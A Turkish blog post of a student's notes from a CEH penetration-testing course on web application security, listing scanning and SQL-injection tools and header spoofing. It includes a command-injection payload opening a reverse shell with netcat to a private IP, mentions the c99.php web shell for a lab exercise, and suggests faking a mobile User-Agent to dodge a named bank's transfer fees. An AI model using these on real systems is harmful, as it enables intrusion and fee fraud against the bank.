Sızma Testleri (Pentests): CEH by BGA - Gün 4

5 Mayıs 2011 Perşembe

Web Uygulama Güvenliği (Devamı)

shodanhq.com/exploits => şimdiye kadar çıkmış açıklıkların aratılabileceği, google'a alternatif, exploitlere özel arama motoru.
LoginFinder. Windows tarafında çalışan bir uygulama. Uygulamalardaki sadece login ekranlarını bulmaya yarıyor.
Paros artık geliştirilmeyen bir ürün.
Owasp ZAP => Paros'un yeni versiyonu gibi değerlendirilebilir.
Flash decompile edilebilir, içinde user/pwd barındırıyor olabilir. Flash testlerinde aklında olsun!
x-forward-for. İncele!!! Bu özelliğin aktif olduğu proxylerde talep başka IP'den gelmiş gibi yorumlar bırakabilir saldırgan sunucuya. IP spoofing normal şartlarda yapılamaz ama bu durumda IP spoofing yapılıyor gibi istekler gönderilebilir işte!
Gelen talebin mobil cihazdan mı, PC'den web üzerinden mi geldiğinianlamanın yolu User-Agent header'ıdır. Bu da client tarafından doldurulan bir alan olduğundan rahatlıkla değişitirlebilir.

Bu konuya örnek Garanti'nin mobil cihazlar üzerinden yapılan EFT'lerden ücret almaması. User-Agent ile oynayıp talep mobil cihazdan gidiyormuş gibi göstererek EFT'ye ücret ödemez.

Genel Düstur: Kullanıcıdan gelen bilgiye kesinlikle güvenilmez.
Flash scanner: swfscan!!!
XSS ile ilgili kitap: XSS Exploits.
testfire.net => DVWA gibi bir site.
TinKode security blog => Hackliyor ve sonuçlarını sitesinde yayınlıyor.
SQLi araçları: Pangolin, Havij. İncele!!!
Command Injection Exploitation: ";nc -e /bin/bash 192.168.200.12 443" => shell açma.

Web Shell. Hacklenen sunucuları daha kolay yönetmek için yazılmış web uygulamaları.

c99.php dosyası DVWA'nın RFI testinde shell açmak için upload edilebilecek dosya. Dosyanın neler yaptığına DİKKAT! Test ettiğimiz makineyi kamuya mal etmeyelim...

Sızma Testleri (Pentests)